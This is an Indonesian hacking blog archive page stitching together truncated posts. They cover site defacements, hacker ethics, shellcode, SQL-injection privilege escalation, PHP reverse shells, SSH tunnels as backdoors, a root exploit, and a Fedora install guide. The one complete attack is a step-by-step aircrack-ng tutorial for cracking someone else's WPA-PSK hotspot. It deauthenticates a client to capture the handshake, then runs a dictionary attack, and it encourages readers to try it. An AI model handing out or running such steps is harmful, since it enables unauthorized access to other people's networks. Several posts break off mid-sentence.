November 22, 2010

Hacker RI – Serang Malaysia!


JAKARTA- Serangan oleh beberapa hacker asal Indonesia terhadap beberapa situsMalaysia ternyata berhasil didokumentasikan di sebuah situs. Seranganini terkait dengan Cyber War yang telah dilancarkan antar kedua negarayaitu Indonesia dan Malaysia dalam beberapa waktu belakangan.
Nampakdi situs tersebut, puluhan screen shoot situs Malaysia yang berhasildisusupi oleh kelompok hacker lokal, macam yadoy66, Tr1993r_m4ch1n3,ninj4_blu3, dan masih banyak lagi yang lainnya. Meskipun saatditelusuri Okezone, Selasa (25/11/2008), ke semua situs tersebut telah berhasil dibetulkan.

Hacking Tools

Berikut adalah ulasan mengenai tool hack yang sering digunakan :

1. Network Stumbler

digunakan untuk mendeteksi sinyal wifi yang berada di sekitar kita. Kelebihannya adalah bisa mendeteksi MAC Address, IP Address, dan lainnya.

2. Kismet

Fungsinya sama dengan network stumbler. namun ada perbedaan dengan Netstumbler, tool Kismet ini bekerja secara pasif dalam mengenali penyusup dalam jaringan. Namun, konfigurasi software ini jauh lebih sulit.

ATM di Serang Malware

Wahh,,lagi lagi malware…

Di Eropa penipuan berbasis ATM meningkat pesat semakin lama para penjahat semakin canggih saja melakukan serangan kejahatan nya. Di sinyalir menurut laporan dari European Network and Information Security Agency (ENISA), jumlah penipuan meningkat drastis sebesar 149 persen pada tahun 2008 dengan tingkat yang tinggi memicu total kerugian kurang lebih sebesar 485,15 juta Euro pada tahun 2008. Wow, banyak aja yah itu duit nya makin dahsyat aja neh para pelaku kejahatan, semakin lama semakin canggih saja bisa lewat ATM tapi dengan cara yang berbeda bukan cara kuno seperti dahulu. Mungkin saja masih banyak penjahat melakukan serangan menggunakan metode lama seperti mengintip langsung PIN dari ATM sang korban, namun ternyata karena semakin pesat perkembangan dari

Seni Hacking menggunakan DOS

Microsoft DOS datang dengan beberapa hacking tool tersembunyi yang akan saya diskusikan disini. Tool ini dapat ditemukan pada direktori c:\windows jika anda menggunakan win98 dan jika anda menggunakan winxp maka tool ini berada pada C:\winxp\system32. WinXP, Win2000 dan WinNT dirilis dengan beberapa tool internet tambahan. Jadi jika anda masih menggunakan win98 maka saya menyarankan agar menggantinya dengan WinXP. Yang tentunya memiliki fitur securiti tambahan dan perintah hacking internet yang bagus. Dalam manual ini saya akan membahas mengenai beberapa perintah yang ditemukan pada Win98 dan winXP

Jadi bagi pengguna window, berikut ini perintah-perintah hacking pada DOS.

10 Cara Kejahatan Lewat Komputer dan Internet

Sebelumnya pernah kita dengar danlihat di TV atau media lainnya bahwa telah terjadi kejahatan yaitu dengan cara membobol rekening bank dan ATM seseorang dalam jangka waktu 5 detik saja, Bagaimana hal itu bisa terjadi ! dampaknya bagaimana ! apa bisa dihentikan ? sebaiknya kita harus tahu dulu beberapa contoh dan jenis dari kejahatan lewat komputer dan internet itu terjadi.

1. Jaringan pada Perusahaan Masih Rawan Cyber Attack Delapan puluh persen perusahaan di dunia mengalami kegagalan dalam mengamankan keamanan jaringannya pada fase yang mendasar. Hal ini diungkapkan berdasarkan hasil survey dari sebuah penyedia jasa keamanan Security Solution and Services Sophos. Berdasarkan laporan yang diutarakan oleh pihak Sophos, setelah melakukan pengecekan terhadap beberapa jaringan perusahaan, beberapa langkah yang dapat dilakukan untuk

November 14, 2010

Tutorial Cara Cracking / Bobol Password Hotspot WPA-PSK Dengan Linux Ubuntu

Kali ini, aku akan mencoba sedkit memberi penejelasan bagaimana sih cara membobol password hotspot yang bertipe wpa-psk dengan mudah.
Cara ini bisa menggunakan linux backtrack 4 dinal release atau linux apapun tertama asal sudah terinstall aplikasi aircrack-ng. Nda berlama-lama mari simak artikel berikut.
Pertama, siapkan CD Live Backtrack atau bisa make linux ubuntu dengan menginstall aplikasi aircrack-ng. Ketik perintah di bawah untuk menginstall aircrack-ng di linux ubuntu

sudo apt-get install aircrack-ng

Kedua, masuk ke dekstop dengan perintah ~# startx (untuk yang make backtrack)
Ketiga, buka konsole (terminal) dan ketikkan perintah untuk melihat interface device yang ada

sudo su

ifconfig -a

Keempt, ketikkan perintah di bawah untuk mengaktifkan interface wlan0

ifconfig wlan0 up

Kelima, sekarang gunakan aplikasi airmon-ng untuk airmon-ng membuat virtual interface mode monitor dengan mengetikkan perintah di bawah.

airmon-ng start wlan0

Keenam, monitorlah jaringan di sekitar kamu. Caranya ketiklah perintah ini.

airodump-ng mon0

cat : mon0 adalah interface virtual hasil dari airmon-ng tadi
Ketujuh, fokuskan monitoring jaringan hotspot yang ingin kita bobol passwordnya. Ketik lagi perintah berikut.

airodump-ng -w coba –channel 11 –bssid 001122334455 mon0

ket: memonitoring khusus jaringan yang memiliki bssid 00:11:22:33:44:55 pada channel 11 dan hasil dari monitoring di tulis pada file yang bernama ‘coba’
Selanjutnya, gunakan serangan dengan cara disconnect salah satu client untuk mendapatkan paket handshake yang dibutuhkan untuk proses cracking

aireplay-ng -0 1 -a 001122334455 -c oo1cbfa13fe3 mon0

ket: aireplay-ng digunakan untuk mendisconnect salah satu client yaitu 00:1C:BF:A1:3F:E3 untuk mendapatkan paket handshake yang dibutuhkan untuk proses cracking
-0 : mode serangan deAuthentication
1 : dilakukan sebanyak 1x deAuth
Terakhir, setelah mendapatkan paket handshake, selanjutnya adalah proses cracking dengan menggunakan aircrack dan file password dengan existensi .lst atau .txt dengan perintah

aircrack-ng coba*.cap -w /pentest/passwords/wordlists/listpass.txt

ket : listpass.txt adalah file password yang saya buat sendiri dan terletak pada /pentest/passwords/wordlists/listpass.txt
Oiya, keberhasilan proses cracking tergantung ada tidaknya password yang ada di list password dengan password yang sebenarnya. Jika password yang digunakan pada jaringan tersebut ada di list password maka proses cracking akan berhasil dan jika password list yang kita miliki tidak mencatat password yang digunakan pada jaringan tersebut kemungkinan keberhasilan proses cracking akan gagal. Dan akhirnya, yang sedikit dari aku ini semoga membantu buat pengetahuan yang belum tau aja. Selamat mencoba

November 13, 2010

Budaya, Etika dan Aturan Main Hacker

Budaya, Etika dan Aturan Main Hacker


Banyak artikel atau tulisan di media tentang ‘hacker’, tapi tidak banyak yang membahas tentang budaya, etika, aturan yang mengatur komunitas misterius ini. Sebuah masyarakat yang hanya ada dan dikenal diantara underground (demikian istilah mereka). Tulisan ini di sadur dari beberapa bahan di Internet underground seperti tulisan Gilbert Alaverdian akan mencoba membahas hal-hal ini, agar masyarakat umum dapat mengerti sedikit tentang sub-culture di dunia underground.

Di media dan stereotype masyarakat tentang hacker adalah orang yang jahat dan suka merusak. Padahal arti sebetulnya hacker adalah tidak seperti yang dibayangkan banyak orang. Stereotype ABG 15 tahun, yang duduk di belakang komputer berjam-jam, masuk ke sistem dan mendelete atau menghancurkan apa saja yang bisa mereka hancurkan. “Anak” ini dikenal sebagai cracker bukan sebagai hacker. Cracker ini yang sering Anda dengar di berita atau media, mematikan situs web, menghapus data dan membuat kekacauan kemanapun mereka pergi.

Di dunia elektronik bawah tanah (underground), nama asli jarang digunakan. Orang biasanya menggunakan nama alias, call sign atau nama samaran. Hal ini memungkinkan kita bisa menyamarkan identitas, dan dikenali sesama underground. Beberapa nama populer diantara hacker Indonesia bisa dikenali seperti hC, cbug, litherr, fwerd, d_ajax, r3dshadow, cwarrior, ladybug, chiko, gelo, BigDaddy dan sebagainya.

Apakah perbedaan mendasar antara cracker dan hacker? Di http://www.whatis.com, cracker di definisikan sebagai “seseorang yang masuk ke sistem orang lain, biasanya di jaringan komputer, membypass password atau lisensi program komputer, atau secara sengaja melawan keamanan komputer. Cracker dapat mengerjakan hal ini untuk keuntungan, maksud jahat, atau karena sebab lainnya karena ada tantangan. Beberapa proses pembobolan dilakukan untuk menunjukan kelemahan keamanan sistem”.

Hacker menurut Eric Raymond di definisikan sebagai programmer yang pandai. Sebuah hack yang baik adalah solusi yang cantik kepada masalah programming dan “hacking” adalah proses pembuatannya. Menurut Raymond ada lima (5) karakteristik yang menandakan seseorang adalah hacker, yaitu:

• Seseorang yang suka belajar detail dari bahasa pemrograman atau system.
• Seseorang yang melakukan pemrograman tidak cuma berteori saja.
• Seseorang yang bisa menghargai, menikmati hasil hacking orang lain.
• Seseorang yang dapat secara cepat belajar pemrograman.
• Seseorang yang ahli dalam bahasa pemrograman tertentu atau sistem tertentu, seperti “UNIX hacker”.

Yang menarik, ternyata dalam dunia hacker terjadi strata-strata (tingkatan) yang diberikan oleh komunitas hacker kepada seseorang karena kepiawaiannya, bukan karena umur atau senioritasnya. Tidak semua orang setuju dengan derajat yang akan dijelaskan disini, karena ada kesan arogan terutama pada level yang tinggi. Untuk memperoleh pengakuan atau derajat, seorang hacker harus mampu membuat program untuk eksploit kelemahan sistem, menulis tutorial (artikel), aktif diskusi di mailing list, membuat situs web dan sebagainya.

Hirarki Hacker
Mungkin agak terlalu kasar jika di sebut hirarki / tingkatan hacker. Istilah ini tidak sepenuhnya bisa diterima oleh masyarakat hacker. Secara umum yang paling tinggi (suhu) hacker sering di sebut ‘Elite’; di Indonesia mungkin lebih sering disebut ‘suhu’. Sedangkan, di ujung lain derajat hacker dikenal ‘wanna-be’ hacker atau dikenal sebagai ‘Lamers’.

1. Elite
Juga dikenal sebagai 3l33t, 3l337, 31337 atau kombinasi dari itu; merupakan ujung tombak industri keamanan jaringan. Mereka mengerti sistem operasi luar dalam, sanggup mengkonfigurasi dan menyambungkan jaringan secara global. Sanggup melakukan pemrogramman setiap harinya. Sebuah anugerah yang sangat alami, mereka biasanya effisien dan trampil, menggunakan pengetahuannya dengan tepat. Mereka seperti siluman dapat memasuki sistem tanpa diketahui, walaupun mereka tidak akan menghancurkan data-data. Karena mereka selalu mengikuti peraturan yang ada.

2. Semi Elite
Hacker ini biasanya lebih muda daripada Elite. Mereka juga mempunyai kemampuan dan pengetahuan luas tentang komputer. Mereka mengerti tentang sistem operasi (termasuk lubangnya). Biasanya dilengkapi dengan sejumlah kecil program cukup untuk mengubah program eksploit. Banyak serangan yang dipublikasi dilakukan oleh hacker kaliber ini, sialnya oleh para Elite mereka sering kali di kategorikan Lamer.

3. Developed Kiddie
Sebutan ini terutama karena umur kelompok ini masih muda (ABG) dan masih sekolah. Mereka membaca tentang metode hacking dan caranya di berbagai kesempatan. Mereka mencoba berbagai sistem sampai akhirnya berhasil dan memproklamirkan kemenangan ke lainnya. Umumnya mereka masih menggunakan Grafik User Interface (GUI) dan baru belajar basic dari UNIX, tanpa mampu menemukan lubang kelemahan baru di sistem operasi.

4. Script Kiddie
Seperti developed kiddie, Script Kiddie biasanya melakukan aktifitas di atas. Seperti juga Lamers, mereka hanya mempunyai pengetahuan teknis networking yang sangat minimal. Biasanya tidak lepas dari GUI. Hacking dilakukan menggunakan trojan untuk menakuti dan menyusahkan hidup sebagian pengguna Internet.

5. Lamer
Mereka adalah orang tanpa pengalaman dan pengetahuan yang ingin menjadi hacker (wanna-be hacker). Mereka biasanya membaca atau mendengar tentang hacker dan ingin seperti itu. Penggunaan komputer mereka terutama untuk main game, IRC, tukar menukar software pirate, mencuri kartu kredit. Biasanya melakukan hacking menggunakan software trojan, nuke dan DoS. Biasanya menyombongkan diri melalui IRC channel dan sebagainya. Karena banyak kekurangannya untuk mencapai elite, dalam perkembangannya mereka hanya akan sampai level developed kiddie atau script kiddie saja.

Sombong
Sombong merupakan salah satu sebab utama seorang hacker tertangkap. Mereka menyombongkan diri dan memproklamirkan apa yang mereka capai untuk memperoleh pengakuan dari yang lain. Hacker lain, karena pengetahuannya masih kurang, biasanya akan memilih target secara hati-hati. Secara perlahan mereka akan naik hirarki mereka sesuai dengan kemampuannya, tanpa menyombongkan dirinya.

Hacker Menolong Industri
Umumnya pembuatan software akan sangat berterima kasih akan masukan dari para hacker, karena dengan adanya masukan ini software yang mereka buat menjadi semakin baik. Memang kadang eksploit yang dihasilkan para hacker tidak langsung di peroleh si perusahaan software, tapi ditahan oleh komunitas underground ini sampai digunakan oleh lamers dan membuat kekacauan.

Etika
Dalam komunitas hacker ternyata ada etika dan aturan main yang membedakan antara hacker dan cracker, maupun hacker kelas rendahan. Salah satu etika yang berhasil di formulasikan dengan baik ada di buku Hackers: Heroes of the Computer Revolution, yang ditulis oleh Steven Levy 1984, ada 6 etika yang perlu di resapi seorang hacker:

1. Akses ke komputer – dan apapun yang akan mengajarkan kepada Anda bagaimana dunia ini berjalan atau bekerja – harus dilakukan tanpa batas dan total. Selalu mengutamakan pengalaman lapangan!
2. Semua informasi harus bebas, tidak disembunyikan.
3. Tidak pernah percaya autoritas – percaya pada desentralisasi.
4. Seorang hacker hanya dinilai dari kemampuan hackingnya, bukan kriteria buatan seperti gelar, umur, posisi atau suku bangsa.
5. Seorang hacker membuat seni dan keindahan di komputer.
6. Komputer dapat mengubah hidup Anda menuju yang lebih baik.

Aturan Main Hacker
• Di atas segalanya, hormati pengetahuan dan kebebasan informasi.
• Memberitahukan sistem administrator akan adanya pelanggaran keamanan atau lubang di keamanan yang Anda lihat.
• Jangan mengambil keuntungan yang tidak fair dari hack.
• Tidak mendistribusikan dan mengumpulkan software bajakan.
• Tidak pernah mengambil resiko yang bodoh – selalu mengetahui kemampuan sendiri.
• Selalu bersedia untuk secara terbuka / bebas / gratis memberitahukan dan mengajarkan berbagai informasi dan metode yang diperoleh.
• Tidak pernah menghack sebuah sistem untuk mencuri uang.
• Tidak pernah memberikan akses ke seseorang yang akan membuat kerusakan.
• Tidak pernah secara sengaja menghapus dan merusak file di komputer yang dihack.
• Hormati mesin yang dihack, dan memperlakukan dia seperti mesin sendiri.

Jelas dari Etika dan Aturan main Hacker di atas, terlihat jelas sangat tidak mungkin seorang hacker betulan akan membuat kerusakan di komputer.

Belajar Membuat Shellcode (I): Local Exploit Shellcode

Seringkali shellcode terlihat dalam source code exploit berbentuk untaian kode-kode hexa. Sebenarnya apa itu shellcode dan apa makna di balik kode-kode hexa itu? Dalam artikel ini saya akan menjelaskan tentang shellcode dan kita juga akan praktek belajar membuat shellcode sendiri.

Shellcode, Exploit dan Vulnerability

Shellcode, exploit dan vulnerability adalah 3 saudara kandung. Semua berawal dari keteledoran sang programmer sehingga programnya mengandung vulnerability yang bisa di-exploit untuk membuat program tersebut menjalankan code apapun yang diinginkan hacker (arbitrary code execution), code ini disebut dengan shellcode.

Dalam kondisi normal, program mengikuti instruksi yang dibuat oleh penciptanya (programmer). Hacker bisa membuat program mengikuti perintahnya dan mengabaikan perintah penciptanya dengan mengexploit vulnerability yang mengakibatkan arbitrary code execution

Continue reading »

Belajar Membuat Shellcode (II): Remote Exploit Shellcode

Sebelumnya saya minta maaf dulu karena absen cukup lama menulis di blog ini. Saya terakhir menulis tentang pembuatan shellcode, untuk local maupun remote exploit. Seharusnya kali ini saya menulis mengenai cara memakai shellcode itu dalam exploit, namun ada satu hal yang menarik untuk ditulis sebelum masuk ke pembahasan exploit, yaitu semi-polymorphic shellcode. Nanti pada artikel selanjutnya saya akan bahas true-polymorphic shellcode.

Apa itu Polymorphic Shellcode

Secara bahasa polymorphic artinya banyak bentuk. Polymorphic shellcode adalah shellcode yang mempunyai banyak bentuk. Dari satu induk shellcode yang sama bisa dilahirkan banyak sekali shellcode yang berbeda-beda dalam level bit, maksudnya bila dilihat bit per bit semua shellcode tersebut berbeda total, padahal semua berasal dari satu induk.

Continue reading »

Memecahkan Kriptografi dengan Chosen-Plaintext Attack

Beberapa waktu yang lalu saya menemukan sebuah website dengan vulnerability SQL injection. Sengaja nama website tersebut tidak saya publikasikan, karena artikel ini bukan tentang SQL injection melainkan bagaimana memecahkan enkripsi.

Berbeda dengan website lainnya, website tersebut menyimpan password dalam tabel user tidak dalam bentuk one-way hash (contohnya MD5 atau SHA1), melainkan dalam bentuk ter-enkripsi. Enkripsi yang dipakai juga unik karena tidak memakai algoritma enkripsi yang sudah dikenal luas.

Dalam kasus tersebut saya ingin melakukan privilege-escalation dari user dengan hak akses biasa menjadi user dengan hak akses penuh. Sebagai user biasa saya bisa melakukan SQLinjection untuk membaca username dan password dari tabel user. Dengan teknik tersebut saya mendapatkan encrypted password dari seorang user yang memiliki hak admin. Namun saya tidak bisa memakai password itu untuk menjadi admin sebelum saya mengerti pesan tersembunyi dalam chiphertext tersebut.

Continue reading »

Berburu Direktori dan File Sensitif dengan DirBuster

Mungkin anda akan terkejut bila mengetahui bahwa ada banyak website yang berhasil dihack/dideface hanya karena sebuah kesalahan “konyol”. Tidak dibutuhkan keahlian programming, SQL atau jurus njelimet lainnya, cuma membuka sebuah direktori yang berisi file-file sensitif, maka sebuah website akan bertekuk lutut. Ya benar, ini adalah fakta yang seringkali terjadi.

Direktori Sensitif

Semua direktori atau file yang mengandung informasi berguna buat hacker untuk mendeface website anda, maka direktori itu termasuk sensitif. Beberapa direktori atau file yang tergolong sensitif antara lain:

Continue reading »

Kupas Tuntas SSH Tunneling

SSH Tunneling adalah teknik yang wajib dikuasai hacker. Teknik ini sangat cocok dipakai sebagai backdoor dari dunia luar langsung menembus ke dalam “behind enemy lines” melewati semua firewall, IDS, IPS atau apapun itu di perbatasan. Dalam artikel ini saya juga menjelaskan bagaimana melakukan chaining tunnel, yaitu menyambung tunnel dengan tunnel lain.

Apa itu Tunneling?

Secara sederhana tunneling berarti mengirimkan data melalui koneksi lain yang sudah terbentuk. Kalau anda buka situs internet banking, pasti anda akan membukanya dengan URL berawalan “https”, yang sejatinya adalah data dalam protokol HTTP yang dikirimkan melalui koneksi dengan protokol SSL, atau “HTTP over SSL”, dalam bahasa gaulnya berarti HTTP digendong sama SSL.

SSH dan SSL adalah dua contoh tunneling protocol, keduanya bisa dipakai untuk menggendong data dalam protokol apa saja (tidak hanya http). Hanya bedanya adalah pada SSL dibutuhkan public key certificate dalam format X.509 yang perlu diverifikasi melalui Certificate Authority resmi. SSH tidak memerlukan public key certificate, sehingga lebih sederhana dan lebih mudah dipakai.

Continue reading »

Reverse Connecting Shell di PHP

Rootshell adalah impian semua hacker. Biasanya seorang hacker yang masuk melalui web vulnerability, akan mengupload webshell. Dengan webshell si hacker bisa mengeksekusi command shell melalui request HTTP. Namun webshell tetaplah bukan true shell, webshell memiliki banyak keterbatasan, salah satunya adalah sifatnya yang tidak interaktif.

Dalam artikel ini saya akan menjelaskan bagaimana caranya mendapatkan true shell yang interaktif dari suatu website yang berhasil dihack. Dari shell tersebut saya juga memperlihatkan contoh eksploitasi lokal untuk meningkatkan privilege dari user biasa (apache) menjadi root dan mensetup sebuah backdoor sehingga si hacker kapan saja bisa mendapatkan rootshell.

Continue reading »

WiFu Cheat Sheet

Saya baru membuat cheat sheet yang cukup padat namun singkat untuk hacking wireless network dengan Aircrack-ng . Aircrack-ng adalah kumpulan tools yang digunakan untuk melakukan hacking terhadap jaringan wireless. Tools yang termasuk dalam aircrack-ng antara lain: airmon-ng, airodump-ng, aireplay-ng, packetforge-ng, aircrack-ng dan masih banyak lagi lainnya.

Pre-requisite:

* Backtrack, nggak harus tapi very recommended
* Wireless adapter dengan kemampuan packet injection. Saya pakai Alfa AWUS036H karena jangkauannya sangat jauh dan works out of the box di backtrack. Daftar lengkap wireless adapter yang compatible dengan backtrack bisa dilihat di daftar ini HCL: Wireless.

Cheat sheet ini mengcover sebagian besar kemungkinan situasi di dunia nyata. Skenario jaringan wireless yang bisa dihack dengan mengikuti cheat sheet ini adalah:

* WEP open authentication dengan client atau tanpa client (clientless WLAN)
* WEP shared key authentication (minimal harus ada 1 client)
* WPA/WPA2 Pre Shared Key (minimal harus ada 1 client)

Hampir semua jaringan wireless yang ada sekarang masuk dalam 3 kemungkinan di atas. Jaringan dengan WEP, praktis bisa dihack semua. Jaringan dengan WPA/WPA2 bisa dihack dengan dictionary attack, jadi sangat tergantung daftar password yang dimiliki. Dalam cheat sheet saya juga menyertakan cara menggunakan john the ripper untuk generate password list atau melakukan modifikasi daftar password dasar menjadi kata baru berdasarkan aturan tertentu.

Oke, selanjutnya langsung saja download cheat sheetnya: WiFu Cheat Sheet 1.0

Applying WiFu Cheat Sheet

Agar lebih mudah memahami pemakaian WiFu Cheat Sheet, saya membuat 4 video tutorial untuk masing-masing skenario, yaitu WEP SKA, WEP OSA, Clientless WEP dan WPA/WPA2 PSK.

Dalam video saya memasukkan MAC address access point, MAC address komputer yang menjalankan backtrack dan MAC address salah satu client yang terkoneksi ke access point ke dalam file macaddress.sh untuk menyederhanakan video. Informasi MAC address access point dan MAC address client bisa didapatkan dengan menjalankan “airodump-ng wlan0″ , sedangkan informasi MAC address komputer sendiri bisa didapatkan dengan menjalankan “macchanger -s wlan0″.

Clientless WEP

Continue reading »

iRedAPD root exploit [with video]

iRedAPD root exploit [with video]


iRedAPD adalah salah satu komponen dari iRedMail yang merupakan kumpulan script dan tools untuk membuat mail server lengkap dengan cara instalasi yang mudah dan sederhana. Saya menemukan kelemahan pada iRedAPD sebelum versi 1.3.3 yang bisa dieksploit untuk mendapatkan root. Bug ini saya temukan bulan juli 2010, advisory sudah diumumkan di sini. Agar lebih jelas, di akhir tulisan saya embed juga video proof-of-concept eksploitasi bug ini.

Continue reading »

November 01, 2010

instalasi fedora

Instalasi Linux
Menggunakan Distro Fedora Core 4
I.
Pendahuluan
Fedora Core 4 merupakan rilis keempat dari paket distro murni opensource yang
disponsori Red Hat, Inc. Dalam rilis versi 4 ini sudah dilengkapi dengan kernel 2.6,
GNOME 2.6, KDE 3.2.2, dll. Fedora Project pada awalnya merupakan proyek komunitas
yang bertujuan membuat program-program RPMS khusus untuk distribusi Red Hat.
Selain itu, proyek ini juga mengembangkan fasilitas otomatis, seperti yum dan apt.
Sementara itu Red Hat, Inc, salah satu distro linux terbesar, memutuskan untuk
melakukan perubahan strategi pengembangan produknya. Red Hat tidak akan
meneruskan produk Red Hat Linux (terakhir versi 9). Sebagai gantinya, untuk versi
komersial Red Hat fokus untuk mengembangkan Red Hat Enterprise Linux. Sedangkan
untuk versi gratis, Red Hat mendukung dan melakukan merger dengan Fedora Project.
Jadi bagi pengguna perumahan dan hobbyist, Red Hat tetap menyediakan versi
download gratis melalui Fedora. Sedangkan bagi perusahaan dan profesional, Red Hat
menyediakan versi komersial Red Hat Enterprise Linux, baik untuk keperluan
workstation, server maupun sistem yang lebih besar.
Kebutuhan Hardware :
Minimum: Pentium-class
Recommended for text-mode: 200 MHz Pentium-class or better
Recommended for graphical: 400 MHz Pentium II or better
Kapasitas harddisk :
Custom Installation (Minimal): 620MB
Server: 1.1GB
Personal Desktop: 2.3GB
Workstation: 3.0GB
Custom Installation (Everything): 6.9GB
Kebutuhan memori :
Minimum for text-mode: 64MB
Minimum for graphical: 192MB
Recommended for graphical: 256MB
Untuk melakukan instalasi linux menggunakan distro Fedora Core 4, ada beberapa cara
yang bisa dilakukan, antara lain :
1.
2.
3.
4.
Instalasi dengan menggunakan CD or DVD
USB pen drives,
hard disk,
Server jaringan
Pada modul ini cara instalasi yang digunakan adalah dengan menggunakan CD atau
DVD, karena cara instalasi ini paling banyak di gunakan. Yang pertama dilakukan
adalah menyiapkan CD instalasi yang terdiri atas 4 CD dan dapat digunakan untuk PC
berprosesor Pentium. CD Instaler Fedora terbagi menjadi beberapa versi, tergantung
aritektur computer (CPU), yaitu :
1. i386 (Intel x86-compatible processors, including Intel Pentium and Pentium-MMX,
Pentium Pro, Pentium-II, Pentium-III, Celeron, Pentium 4, and Xeon; VIA C3/C3-m and
Eden/Eden-N; and AMD Athlon, AthlonXP, Duron, AthlonMP, and Sempron )
1
2. ppc(PowerPC processors, such as those found in Apple Power Macintosh, G3, G4, and
G5, and IBM pSeries systems
3. x86_64(64-bit AMD processors such as Athlon64, Turion64, Opteron; and Intel 64-bit
processors such as EM64T
II.
Memulai Instalasi
Fedora mempunyai 2 cara dalam instalasinya, yang pertama adalah mode text, yang
setiap option (pilihan) dalam proses instalasinya ditunjukkan dengan text, dan yang
kedua adalah mode grafik. Kelebihan dari mode text adalah kecepatan, sedangkan
kesulitannya adalah user yang belum familiar dengan linux akan merasa sangat
kebingungan, dengan option yang muncul. Dalam modul ini akan digunakan mode
grafik (graphical mode). Langkah-langkah yang harus dilakukan dalam memulai
instalasi adalah :
A. Boot
1. Pastikan komputer akan boot pertama (first boot) dari CD ROM, dan bukan
melalui device yang lain (Harddisk,Disket atau network). Setting ini dilakukan
pada BIOS komputer (dengan menekan tombol del pada keyboard).
2. Masukkan CD/DVD Pertama Fedora Core 4, kemudian akan tampil halaman
pertama dari proses instalasi seperti pada gambar 1 dibawah ini.
Gambar 1. Tampilan awal ketika proses instalasi
Gambar2. Media Test dialog
3. Tekan Enter untuk memulai instalasi
dengan graphical mode, tekan linux text
untuk memulai instalasi dengan mode
text dan linux rescue untuk memperbaiki
instalasis linux yang sudah ada.
4. Kemudian setelah ditekan Enter
kemudian akan muncul windows
(kotak dialog) apakah kita akan
mengecek
CD
instaler
kita,
ditunjukkan pada gambar 2. Tekan OK
untuk melakukan pengecekan Media
(CD/DVD), atau tekan cancel untuk
Skip pengecekan media.
5. Kemudian akan muncul hasil dari
2
Gambar 3. Media test Selesai dengan hasil Pass
pengecekan media, apakah
Media (CD/DVD Instaler)
dalam
keadaan
baik,
sehingga
akan
menghasilkan hasil (result)
PASS atau dalam kondisi
rusak
(FAILED).
Kondisi
apabila CD dalam kondisi
baik di tunjukkan pada
gambar 3.
6. Proses pengecekan media
akan berlangsung selama 4
kali, proses ini dapat dilewati
(by pass) dengan menekan
tombol Skip.
B. Identifikasi Hardware
Jika Fedora mendeteksi memory sistem yang kurang dari 128MB, maka Fedora akan
memakai Interface tampilan antar muka yang berupa teks dan bukan Mode grafik.
1. Setelah beberapa proses diatas telah di lewati, berikutnya Fedora akan
menampilkan beberapa bahasa yang bisa digunakan dalam proses instalasi,
salah satunya adalah bahasa Indonesia. Gambar 4 di bawah ini menunjukkan
jendela pilihan menu bahasa. Secara Default bahasa yang digunakan adalah
bahasa Inggris.
Gambar4. jendela untuk memilih bahasa yag digunakan saat Instalasi Fedora
2. Jika proses pemilihan bahasa sudah selesai lanjutkan ke tahap berikutnya
dengan menekan tombol Next.
3. kemudian Fedora akan menampilkan, layout keyboard yang disupport
(didukungnya). Secara default layout yang didukung adalah US. English. Apabila
sudah, lanjutkan ke tahap berikutnya dengan menekan Next.
4. Tahap selanjutnya, Fedora akan mengecek instalasi Distro Fedora Core versi
sebelumnya. Seperti halnya ketika kita memulai istalasi windows. Dan prinsipnya
hampir sama.
3
Gambar5. memeriksa Instalasi Fedora Versi sebelumnya
5. Apabila kita memilih Instal Fedora Core, berarti kita memilih istalasi baru. Data-data
pada partisi linux akan dihapus dan di format. Sedangkan apabila kita melilih
Upgrade an existing insatalation. Maka kita akan mengupgrade paket-paket pada
instalasi fedora sebelumnya dan upgrade bootloadernya.
Gambar6. Upgrade bootloader pada Instalasi Fedora
C. TYPE INSTALASI
Dalam Instalasi Fedora Core4, sebagaimana distro linux yang lain. Sebuah distro linux
menyediakan beberapa type instalasi, yaitu :
1.
Personal Desktop
Type Personal Desktop merupakan type default dari instalasi Fedora, dalam
type ini dimasukkan lingkungan kerja menggunakan mode grafik baik KDE atau
GNOME, dan didalamnya terdapat paket OpenOffice, Aplikasi Internet dan
perangkat lunak multimedia.
4
2.
3.
4.
Workstation
Type Workstation, dalam type instalasi ini, sama dengan type Personal
Desktop ditambah dengan peragkat lunak (software) yang digunakan dalam
sistem administrasi dan pengebangan. Gunakan type instalasi ini apabila
dalam penggunaannya nanti memerlukan kompilasi terhadap source code dan
instalasi software baru.
Server
Type Server, digunakan apabila kita ingin mendesain atau menjadikan
komputer kita menjadi server, baik server Web, server FTP, Basis Data
Biasanya pengaturan server atau konfigurasinya menggunakan terminal yang
menggunakan mode text.
Custom
Sedangkan untuk custom instalation, biasanya digunakan oleh pengguna yang
sudah mahir. Karena dalam type instalasi ini, pengguna harus mengetahui
paket apa yang akan diinstal, misal untuk aplikasi administrasi nama paket
yang diinstal adalah Open Office dan paket untuk file sharing menggunakan
Samba.
Apabila pemilaihan paket sudah selesai dilanjutkan dengan menekan tombol
next.
Gambar7. jendela untuk memilih bahasa yag digunakan saat Instalasi Fedora
D. PARTISI HARDISK
Jika anda baru saja mencoba linux, gunakanlah automatic partition untuk
melakukan partisi hardisk yang akan digunakan untuk instalasi linux. Karena pada
tahap ini adalah tahap yang paling ‘kritis’, bagi pengguna yang ingin mengistal linux
tapi sekaligus windowsnya tetap ada, atau sering dikenal dengan double OS
(Operating System). Bisa jadi partisi windows anda akan didelete dengan tidak
sengaja karena tidak tahu partisi yang mana yang akan di format untuk di instal
linux. Cara yang kedua adalah dengan menggunakan cara Disk Druid, cara ini
adalah cara manual untuk melakukan partisi terhadap hardisk, sekaligus untuk
mengubah ukuran dan type hardisk.
5
Gambar8. memilih cara partisi harddisk pada Instalasi Fedora
1. Automatic Partitions
• Remove all Linux partitions on this system
Pilihan untuk menghapus seluruh partisi linux baik yang bertipe (ext2,
ext3, dan Linux swap) dari harddisk
• Remove all partitions on this system
Pilihan menmformat ulang harddiskdan menghapus seluruh partisi
yang ada , baik partisi windows (FAT,FAT32,NTFS) dan partisi Linux
(ext2,ext3, dan swap). Jangan pilih menu ini jika data-data pribadi
anda yang penting ada di partisi windows !!!.
• Keep all partitions and use only existing free space
Pilihan untuk menggunakan sisa ruang harddisk, dan linux akan
membuat partisi di ruang sisa tersebut. Pilihan ini juga berarti
membiarkan partisi yang telah ada.
Gambar9 Menu pilihan menggunakan Automatic partition
Setelah menentukan cara partisi ini, kemudian lanjutkan dengan menekan
tombol next.
6
2. manually partition with disk druid
Sebuah sistem direktori pada Fedora Core, sedikitnya terdiri dari 3 buah partisi,
yaitu :
• partition dibawah /boot
• partition dibawah direktori / (root direktori)
• swap (semacam virtual memory pada Sistem operasi windows)
Banyaknya partisi tergantung pada kebtuhan sistem yang kita buat, PC untuk
workstation tentung kebutuan partisinya akan berbeda dengan PC yang
